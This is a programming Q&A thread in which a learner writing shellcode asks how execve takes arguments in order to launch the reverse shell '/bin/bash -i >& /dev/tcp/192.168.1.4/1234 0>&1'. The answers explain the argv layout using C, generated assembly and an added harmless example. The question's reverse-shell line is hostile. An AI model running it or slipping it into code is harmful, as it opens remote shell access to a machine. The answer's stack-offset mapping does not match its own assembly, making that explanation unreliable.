user2296580

Reputation: 21

pass arguments to execve program in shellcode

I'm having a go at learning assembly and writing shellcode. I have a question about execve and passing arguments to the program it will execute.

I have working code to execute a bash shell but am unsure of the input format of execve to pass additional arguments to it. Can I do stdin/stdout redirects too? I wanted to create a reverse TCP connection with this type of command line:

/bin/bash -i >& /dev/tcp/192.168.1.4/1234 0>&1

Should the arguments be separated with NULLs? I got it to execute a shell but it didn't connect back to the listening nc.

I know this is an unusual way of doing this but I just wanted to try something different :-)

Cheers

Upvotes: 2

Views: 4731

Answers (1)

perror

Reputation: 7386

The best way to know how to do it is to compile an example and stop at the assembly level. Let's take this example:

#include <unistd.h>

int
main ()
{
  char *program = "/bin/ls";
  /* execv expects argv to end with a NULL pointer; without the
     terminator it reads past the end of the array. */
  char *args[4] = {"/bin/ls", "-l", "./", NULL};

  execv(program, args);

  return 0;
}

When compiled with gcc -Wall -Wextra -S -o myexec.s myexec.c you can read in myexec.s:

        .file   "myexec.c"
        .section        .rodata
.LC0:
        .string "/bin/ls"
.LC1:
        .string "-l"
.LC2:
        .string "./"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        pushq   %rbp
        movq    %rsp, %rbp
        subq    $32, %rsp
        movq    $.LC0, -8(%rbp)
        movq    $.LC0, -32(%rbp)
        movq    $.LC1, -24(%rbp)
        movq    $.LC2, -16(%rbp)
        leaq    -32(%rbp), %rdx
        movq    -8(%rbp), %rax
        movq    %rdx, %rsi
        movq    %rax, %rdi
        call    execv
        movl    $0, %eax
        leave
        ret

So, the list of arguments of the command line is composed of a list of strings: the first argument is the path to the executable file (-8(%rbp)), then each argument is passed through a pointer to its string: argv[0] = -16(%rbp), argv[1] = -24(%rbp), argv[2] = -32(%rbp), and so on.

So, you just have to have the addresses of each string and push them (in the proper order) onto the stack before calling execv.

Upvotes: 1
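An added example (not the asker's or the answerer's code) showing the NULL-terminated argv layout that execve walks, and why redirection operators like ">&" and "0>&1" from the question cannot be passed as separate argv entries: they are shell syntax, so the whole line has to reach the shell through "-c". The function names run_with_argv and run_sh_command are my own, and it uses /bin/sh with a harmless echo.

```c
#include <stddef.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Number of argv entries before the NULL terminator: this is exactly what
 * the kernel walks when execve copies argv into the new process. A missing
 * terminator makes it read past the array (undefined behaviour). */
size_t argv_count(char *const argv[]) {
    size_t n = 0;
    while (argv[n] != NULL)
        n++;
    return n;
}

/* fork, execve in the child, and return the child's exit status
 * (-1 if fork/wait failed, 127 if execve itself failed). */
int run_with_argv(const char *path, char *const argv[]) {
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL }; /* envp is NULL-terminated too */
        execve(path, argv, envp);
        _exit(127); /* only reached when execve fails */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Redirections such as ">/dev/null" or "2>&1" are shell syntax: execve never
 * parses them. The whole command line goes to the shell as one argv entry
 * after "-c", and the shell performs the redirection itself. */
int run_sh_command(const char *cmdline) {
    char *const argv[] = { "/bin/sh", "-c", (char *)cmdline, NULL };
    return run_with_argv(argv[0], argv);
}

int main(void) {
    /* Wrong layout: the operator becomes a literal argument, so sh tries to
     * open a script file named "echo" and fails instead of redirecting. */
    char *const wrong[] = { "/bin/sh", "echo", "hi", ">/dev/null", NULL };
    printf("wrong layout exit status: %d\n", run_with_argv(wrong[0], wrong));

    /* Right layout: one string for sh -c to parse. */
    printf("sh -c exit status: %d\n", run_sh_command("echo hi >/dev/null; exit 7"));
    return 0;
}
```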
